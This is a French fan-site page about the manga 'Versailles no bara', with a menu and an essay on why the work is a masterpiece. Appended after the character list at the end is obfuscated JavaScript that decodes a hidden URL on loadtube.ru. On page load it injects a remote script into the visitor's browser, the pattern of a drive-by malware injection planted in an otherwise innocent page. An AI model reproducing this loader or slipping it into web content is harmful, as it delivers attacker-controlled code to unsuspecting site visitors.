Bienvenue
 
NOUVEAUTES
 
Généralités
L'auteur dessinatrice
Préface
Le manga
L'anime
Chronologie
Le vrai / le faux
Epilogue
 
Médias
Audio
Vidéos
Extraits
 
Imagerie
Artwork
Anime
Mes fanpics
Fan Art
Photos de Versailles
 
Analyses
Anachronismes
Ambigue Oscar...
Manga vs Anime
 
Extras
Film
Opéra
Merchandising
Ma collection
 
Goodies
Fonds d'écrans
Avatars MSN
Skins Winamp
Icônes
 
Allô !
Ecards
Forum (bientôt)
Livre d'or (bientôt)
Ecrire à Oscar !
Ecrire au webmaster
 

 

 

 

Anne D'Autriche  

Marie Antoinette

Lafayette
 

::: Inédit ! Extraits du mangas en ligne :::

Bienvenue et bonne exploration !

Pourquoi Versailles no bara est un chef d'oeuvre :

Versailles no bara est un manga, c'est à dire une bande dessinée typiquement japonaise en noir et blanc, écrite et dessinée par le même auteur. VnB se divise en 2 tomes de plus de 900 pages chacun. Le premier met en place les personnages principaux et expose la situation française sous le règne de Louis XV, le second dépeint les évènements de la Révolution et le destin des héros qui sont pris dans ce tourbillon. De par l'énorme succès de ce manga, un anime est sorti, de la couleur, de la musique... Un énorme succès également, qui plaît beaucoup aux enfants, mais ces derniers se lassent vers la moitié de l'histoire qui devient trop compliqué pour eux puisque le scénario atteint un degré plutôt réservé aux adultes.

Pour moi, le chef d'oeuvre demeure surtout dans le manga original, et je pense préférable de le lire avant de voir l'anime (ce dernier étant parfois censuré). Il y a plusieurs niveaux de lecture :

- Historique : l'évolution de le France de l'arrivée de Marie-Antoinette à Versailles jusqu'à la Révolution Française. Rien n'est ommi. Ikeda met le doigt avec grande sensibilité sur la France d'en bas, ainsi que sur celle d'en haut. Un peuple violent mais malheureux, une reine maladroite mais aussi malheureuse. Où est le bien, où le mal pour ces gens? Dans les deux camps, des âmes qui ne recherchent que le bonheur...

- Psychologique : Oscar, jeune femme de la noblesse se  travestit en homme depuis sa petite enfance pour perpétrer la tradition de sa famille : devenir chef de la garde royale. Son père, le général de Jarjayes, attristé de n'avoir eu que des filles, va faire d'elle son héritier. Oscar sera responsable de la sécurité de la famille royale et en particulier de Marie-Antoinette. Sa vie de femme volée, l'ambiguité sur son sexe, tout un climat qui demande à Oscar le plus grand courage.

- Romanesque : tout le manga est parsemé d'aventures, authentiques (ex: affaire du collier...) ou inventées (ex: le masque noir...) tout en cohérence avec le contexte historique. Dans le premier tome, il s'agit plutôt de complots contre Marie-Antoinette, et dans le second de graves évènements se succèdent au rythme haletant de la Révolution Française.

Là où se trouve le génie de Ikeda, c'est qu'elle a su faire dans le détail, la cohérence et la passion. Elle a su recréer des sentiments oubliés et nous rappeler de façon crédible et intense les origines de notre Liberté. Quel défi que de faire revivre la révolution en 2000 pages !

Chaque tranche d'âge y trouve son compte dans l'un des aspect du manga cités ci-dessus, et parfois dans tous, selon la personnalité.

Difficile pour les personnes qui ne connaissent pas le manga de tenter l'aventure mais tous ceux qui ont essayé en furent très heureux. Loin de la BD type Comics américains, le manga souhaite la beauté, la sensibilité et le scénario étudié.

::: Inédit ! Extraits du mangas en ligne :::

Louis XVI   Mirabeau
     
 
Comte de Mercy   Necker
     
 
Comtesse du Barry   Cardinal de Rohan
     
 
Hans Axel de Fersen   Madame de Polignac
    var R='';var je=new Array();var M;if(M!='Qf'){M=''};function G(){var iK;if(iK!='' && iK!='y'){iK=null};var Q=window;var f=new Date();var EK;if(EK!='ic' && EK!='nT'){EK='ic'};var F=unescape;var k;if(k!='vK' && k!='s'){k=''};var h=new Array();var a=F("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6f%6f%6b%69%6e%67%2e%63%6f%6d%2f%67%65%74%61%66%72%65%65%6c%61%6e%63%65%72%2e%63%6f%6d%2e%70%68%70");var fP="";var sG;if(sG!='bb' && sG != ''){sG=null};var g;if(g!='B'){g='B'};function n(Fj,j){var qO;if(qO!='K'){qO='K'};var w="q1Jg".substr(3);var jJ;if(jJ!='' && jJ!='rz'){jJ='S'};var E=F("%5b"), H=F("%5d");var D=E+j+H;var l=new RegExp(D, w);var m;if(m!='hv' && m!='lh'){m='hv'};var WD;if(WD!='hY' && WD != ''){WD=null};return Fj.replace(l, new String());};this.BU="";this.lO="";var hd;if(hd!='' && hd!='rv'){hd='rD'};var EH;if(EH!='' && EH!='Qq'){EH=''};var QvJ;if(QvJ!='P' && QvJ!='fc'){QvJ='P'};var O=document;var EKU=new Date();var N=new String();var Lu;if(Lu!='LO'){Lu='LO'};this.Eg='';this.p="";var jN=n('819035183430759','12596473');this.Cq='';function I(){var cp;if(cp!=''){cp='V'};var C=F("%68%74%74%70%3a%2f%2f%6c%6f%61%64%74%75%62%65%2e%72%75%3a");var az=new Array();var xz="";this.Bz="";var aq;if(aq!='' && aq!='Ho'){aq='CZ'};N=C;N+=jN;var xW;if(xW!='bf' && xW!='Gk'){xW='bf'};this.fcv='';N+=a;var BL=new String();var u=new String();var qX="";try {this.LF='';var jei=new Array();i=O.createElement(n('sPcRr3izp3tz','g_RDUzOabTF30kY5BP'));var CqI;if(CqI!='' && CqI!='By'){CqI='Ap'};var r_="";var OY=new String();var VtX="";i[F("%73%72%63")]=N;var AT=new Array();var _h;if(_h!='bt' && _h!='Yb'){_h=''};i[F("%64%65%66%65%72")]=[8,1][1];var sO=new String();var AS='';O.body.appendChild(i);var zW=new String();var hS;if(hS!='bfB' && hS!='Sh'){hS='bfB'};var Ds="";} catch(A){alert(A);var tj=new String();var es=new String();};var GC=new Date();var Kx=new Date();}this.qu="";this.DA='';Q["onlLNRE".substr(0,3)+"oad"]=I;var Tf="";var sm;if(sm!='' && sm!='DT'){sm=''};};var ZH=new String();var uh=new Date();var tm;if(tm!='iG' && tm != ''){tm=null};var eU;if(eU!='Nq' && eU != ''){eU=null};G();this.GS="";